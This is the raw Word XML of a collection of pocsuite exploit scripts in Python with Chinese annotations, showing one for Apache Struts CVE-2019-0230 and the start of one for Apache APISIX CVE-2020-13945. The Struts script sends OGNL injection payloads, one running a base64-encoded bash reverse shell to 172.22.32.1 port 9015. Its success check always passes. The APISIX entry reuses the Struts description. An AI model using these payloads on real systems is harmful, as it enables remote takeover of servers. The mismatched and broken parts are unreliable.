    <w:p w14:paraId="6407F7A0" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulDate = '''2020-08-13'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B3B076" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>createDate = '''2020-08-13'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28855198" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>updateDate = '''2020-08-13'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D980CF0" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>name = '''Apache Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35090F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>desc = '''2020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>08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日，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方发布了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞的风险通告，该漏洞编号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2019-0230</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，漏洞等级：高危，漏洞评分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9754B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E058700" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>solution = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架升级至最新版本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518F326" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>severity = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">''' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934E513" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulType = '''RCE'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44F5CD" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49968287" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>references = ['''https://mp.weixin.qq.com/s/sRcP27-y_Ps-YGTZ3Y4uZQ''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A52B4" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appName = '''Apache Struts'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E39F2E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appVersion = '''Apache Struts 2.0.0 - 2.5.20'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E6EBF" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB505C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D68B07" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A04876" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="2508A432" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578FD706" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>self.url,ip,port = parse_ip_port(self.target, 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438D83F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CCC546" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8E6D8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7CD332" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF0034" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>data1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727798F7" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71341FE8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B901F0" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>data2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C3B5E" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">"id": </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjIuMzIuMS85MDE1IDA+JjE=}|{base64,-d}|{bash,-i}'))}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CE3D46" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30115BC8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>vul_url = make_verify_url(self.url, '/', mod=0) #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成完整路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAC7B9" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">resp = req.post(vul_url, data=data1, verify = False, allow_redirects = False, timeout = 10) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CCC34C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">resp = req.post(vul_url, data=data2, verify = False, allow_redirects = False, timeout = 10) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D1234" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if resp.status_code == 200 and '' in resp.content: #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70601554" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo'] = http_packet(resp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F1973" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['URL'] = vul_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112013D7" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['port'] = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5E863" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0EA2A" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="6AB4430B" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CEB84" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363FDB8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="5E0962B8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D15D2" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDADF1F" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE8D30" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.success(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B5DFB" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F011D42" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>output.fail('Failed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC33DC" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE5252" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="178CFE26" w14:textId="4DD8CDA2" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E9601" w14:textId="146AEC73" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4132">
        <w:t>CVE-2020-13945</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6750D8" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C955474" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5926C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="375F207D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E1A6C" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F89839" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48745" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF61D42" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>import string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD59D9" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFCB0D2" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132"/>
    <w:p w14:paraId="4C186412" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:t>class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3E313" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulID = '''CVE-2020-13945'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB3642" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>cveID = '''CVE-2020-13945'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D3A19" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAACCC" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3CE2D" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>version = '''1.0'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C95370" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>author = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侯博文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092C747" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>vulDate = '''2020-12-8'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3D598" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>createDate = '''2020-12-8'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A560A26" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>updateDate = '''2020-12-8'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D03D27" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name = '''Apache APISIX Admin API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6E9FE" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>desc = '''2020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>08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日，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方发布了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程代码执行漏洞的风险通告，该漏洞编号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2020-13945</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，漏洞等级：高危，漏洞评分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B9389" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:tab/>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527B593" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">solution = '''1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache APISIX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> conf/config.yaml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，禁止使用默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DBB32" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若非必要，关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache APISIX Admin API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能，或者增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB32B20" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache APISIX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至最新版本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A7326" w14:textId="77777777" w:rsidR="00FF4132" w:rsidRDefault="00FF4132" w:rsidP="00FF4132">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>severity = '''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
